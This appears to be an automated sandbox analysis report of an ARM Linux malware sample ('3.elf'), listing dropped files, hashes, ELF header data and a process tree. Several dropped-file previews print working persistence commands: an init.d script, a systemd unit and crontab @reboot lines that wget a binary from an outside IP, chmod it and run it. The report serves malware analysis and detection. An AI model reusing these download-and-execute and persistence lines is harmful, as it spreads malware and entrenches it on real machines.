                Reputation:low
                Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 |C 2 R -1157128192..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                Process:/tmp/3.elf
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):308
                Entropy (8bit):5.266179165223316
                Encrypted:false
                SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOA7SF5CLnEZKCKXIEXwsCBLQmWA4Rv:zb9RZADJiIE+mJqBnYLLHWrv
                MD5:1837DF477D158FC4F1D749935E57BE7E
                SHA1:88A9FF44E6E7B949A4D9A3B7449BBC3566692702
                SHA-256:6ED7EDCA075697398D43321BC12B37575A442D25BC561F261DC3236EAA6C594F
                SHA-512:CEC5322A238F09D60C8EF0C632B7FD485A8E22AEB08432C521A842D34E2AE6F4B44E7E8277AF83139C783B50CAE4CBDBCA7E19CF272F68758EF9F4834BA1B387
                Malicious:false
                Reputation:low
                Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 |C 2 R -1157128192..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File Type:ASCII text
                Category:dropped
                Size (bytes):76
                Entropy (8bit):3.7627880354948586
                Encrypted:false
                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                Process:/tmp/3.elf
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):130
                Entropy (8bit):4.7473770143893175
                Encrypted:false
                SSDEEP:3:SH3HX/KZFSeMPHRCWbTSFDOSGuVMFZKCoXXIUU0XzT9Fw2sePn:SH3HS7SF5CLnEZKCKXIEX9W5Cn
                MD5:9B388642F666CE5070E78FA198B8A35F
                SHA1:D212043CFC66EEDF4ED7AC4135D9CE929DBEC365
                SHA-256:E479898964D0E5E3FB6758405B28E825217FFA406EE5334647A954952E281E25
                SHA-512:3BA5B9982056E554AF98B96F44C7EE247389A5A94C06F33420C5A5B5935C0E948B2A74638AE488743A316C950BF047101C82C06CF9A44EF2EC145C60719B537A
                Malicious:true
                Reputation:low
                Preview:@reboot rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                Process:/tmp/3.elf
                File Type:zlib compressed data
                Category:dropped
                Size (bytes):257
                Entropy (8bit):3.3677374991124718
                Encrypted:false
                SSDEEP:6:GYgDFzimXM/VUT4DFziu/IWz/VjmsVot/VOArB/VF:+timXNctiXr/
                MD5:B095B686ED77E7C4E60D2459F36AF617
                SHA1:434340912BCA8962DEE6713DDC73286CBA016073
                SHA-256:805CB9B160B8F36C9E712FFA4C2FEA9E017756A0342CED9A81C80CCAE49B711F
                SHA-512:DC62CC2A0B75CDE349C18E016AD86EDECCFB1DDF1AE44A364A22A14B7D96E49BB4669F1CA103809DBB930E5D1B75FFE9AF12E76EDD944A0A33B45E800F3D8E3F
                Malicious:false
                Preview:8000-1e000 r-xp 00000000 fd:00 531606 /tmp/3.elf.26000-27000 rw-p 00016000 fd:00 531606 /tmp/3.elf.27000-2c000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                Process:/usr/bin/crontab
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):320
                Entropy (8bit):5.19949448246
                Encrypted:false
                SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ4oiGMQ5UYLtCFt3HYHS7SF5CLnEZKCKXIEX9z:8Qj7QEuLut8TUeHLUHYHrqBnYK
                MD5:46F37BDEB60835C1E087177C74DC1F68
                SHA1:EBA2171D7F62CA14C5C9B6F32D60164ACB29C6C5
                SHA-256:91DC144B855A5051A9A1A2044389F53DA301E16053DDE03CA31F6C7AE36BA79E
                SHA-512:8DDF0B57917B8265DC05B61B8A06427248315C86F91C458122069C7C4A251657FD1860DF95152952A8FBDF97A4DFF8E744C3E8616A0EE997937AFB915040601E
                Malicious:true
                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sat Jan 11 14:32:57 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                Entropy (8bit):6.103806013417141
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:3.elf
                File size:91'804 bytes
                MD5:c618cd5a649b133e94ad21adec9b5d0b
                SHA1:bf13ccbb7ac6d6dd809ccab6d82bda3dcb34bf65
                SHA256:1603c962cec7082a9464194f32f078a9af6056cda7756aa1f26be5018a55a846
                SHA512:0eb33b8a86163044911500506d4724fda02d46e848daadc9ccfe7cc2fbc15c9694439841cd8d2c007e906b601254f294820e62a43f0dff304e2ebe2ddd4413ee
                SSDEEP:1536:5D/M0Uon6cRSmjV2nuzk0D0Ki+e4bZGGF7FM/ep/dCnjGSAyUX0v7p6d0:m0jx0mjV9z5ij49LtFM/ep/0fAyUX0vA
                TLSH:51930946F980A612C2D256B7BB1F028D37155BA8E2DB33439C350B61B3DFA1F1E27646
                File Content Preview:.ELF...a..........(.........4....d......4. ...(......................]...]...............`...`...`......L...........Q.td..................................-...L."....P..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:ARM - ABI
                ABI Version:0
                Entry Point Address:0x8190
                Flags:0x202
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:91364
                Section Header Size:40
                Number of Section Headers:11
                Header String Table Index:10
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80940x940x180x00x6AX004
                .textPROGBITS0x80b00xb00x143a80x00x6AX0016
                .finiPROGBITS0x1c4580x144580x140x00x6AX004
                .rodataPROGBITS0x1c46c0x1446c0x19840x00x2A004
                .eh_framePROGBITS0x260000x160000x40x00x3WA004
                .ctorsPROGBITS0x260040x160040x80x00x3WA004
                .dtorsPROGBITS0x2600c0x1600c0x80x00x3WA004
                .dataPROGBITS0x260180x160180x4840x00x3WA004
                .bssNOBITS0x2649c0x1649c0x29b00x00x3WA004
                .shstrtabSTRTAB0x00x1649c0x480x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80000x80000x15df00x15df06.11880x5R E0x8000.init .text .fini .rodata
                LOAD0x160000x260000x260000x49c0x2e4c6.02590x6RW 0x8000.eh_frame .ctors .dtors .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                System Behavior

                Start time (UTC):20:32:52
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:/tmp/3.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:56
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:56
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:56
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:56
                Start date (UTC):11/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl daemon-reload
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl start hello.service
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/usr/bin/crontab
                Arguments:crontab /tmp/crontab.tmp
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:58
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:58
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:33:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:33:57
                Start date (UTC):11/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):20:32:53
                Start date (UTC):11/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):20:32:57
                Start date (UTC):11/01/2025
                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File size:22760 bytes
                MD5 hash:3633b075f40283ec938a2a6a89671b0e